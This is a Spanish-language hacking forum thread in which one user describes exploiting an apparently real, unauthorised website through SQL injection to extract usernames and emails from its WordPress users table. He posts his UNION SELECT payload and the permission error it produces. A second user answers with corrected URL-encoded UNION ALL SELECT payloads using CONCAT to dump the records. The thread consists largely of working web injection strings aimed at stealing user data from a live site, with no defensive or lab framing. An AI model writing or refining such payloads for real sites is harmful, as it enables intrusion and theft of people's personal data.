 Autor
|
Tema: El fin de la SQLi (Leído 2,833 veces)
|
bytefloat
 Desconectado
Mensajes: 5
|
Hola, soy bytefloat, el fin de una sql injection se presenta cuando..? SELECT command denied to user 'www'@'localhost' for table 'tables' Si ya sé cuantas tablas hay, el nombre de ellas, las columnas de una en específico, y al momento de conseguir el id=1 de una tabla me presenta aquel error, no hay nada que hacer? -1/+union+select+1,unhex(hex(notice_id)),3,4,5,6,7,8,9,10+from+wp_users.tables+limit+1,1-- Saludos  |
|
|
|
|
En línea
|
|
|
|
|
Shell Root
|
No entendi lo que quieres preguntar.
|
|
|
|
|
En línea
|
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
|
|
|
bytefloat
Desconectado
Mensajes: 5
|
Claro, tenía cierta página la cual es vulnerable a sqli, por lo que proseguí a sacar el nombre de las tablas dentro de ellas, columnas, etc .. , hasta que llegue a la tabla de "users", la cual quise investigar dentro más de ella, saque que su primer columna es "users", su segunda es "mail", sólo me interesan estas, entonces quiero sacar el users y mail del id=1 , pero al hacerlo me manda el siguiente error intentando con el siguiente código: php?id=-1+union+select+1,unhex(hex(users)),3,4,5,6,7,8,9,10+from+wp_users.tables+limit+1,1-- SELECT command denied to user 'www'@'localhost' for table 'tables' Y no puedo saber el usuario.. Si no se me entiende, supongamos que quiero sacar user y pass de la tabla wp_users la cual ya sé sus columnas, pero que al momento de hacer un select a los usuarios no me deja Saludos |
|
|
|
|
En línea
|
|
|
|
|
Shell Root
|
Es como si no tuviera permisos para realizar un SELECT, pero no se estaraís haciendo, pero si me dices que ya sabes cual tabla es, los campos de la tabla, y ahora quieres mirar el registro. Sería algo como esto: -1/+UNION+ALL+SELECT+1,CONCAT(users, ':', mail),3,4,5,6,7,8,9,10+FROM+wp_users+LIMIT+1,1--
PD: Te envie un M.P! -- EDIT ---------------------------------------------------------- No se como estaras haciendo pero mal! -1%09UNION%09ALL%09SELECT%091,usuario,3,4,5,6,7,8,9,0%09FROM%09usuarios--
|
|
|
|
« Última modificación: 13 Febrero 2015, 22:29 pm por Shell Root »
|
En línea
|
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
SQLI en MS Acces
Nivel Web
|
Nork
|
3
|
2,916
|
4 Mayo 2009, 13:48 pm
por Nork
|
|
|
|
GiE 4.8 - SQLi
Nivel Web
|
Pony-Magic
|
4
|
6,578
|
17 Diciembre 2010, 14:37 pm
por xassiz~
|
|
|
|
SQLi
Nivel Web
|
hache1989
|
2
|
2,653
|
18 Diciembre 2012, 06:15 am
por dRak0
|
|
|
|
[Ruby] SQLI Scanner 0.4
Scripting
|
BigBear
|
0
|
1,671
|
7 Agosto 2015, 22:25 pm
por BigBear
|
|
|
|
¿Sqli directo o Wordpress?
Bugs y Exploits
|
Svlly
|
3
|
2,944
|
4 Enero 2017, 19:28 pm
por #!drvy
|
 |
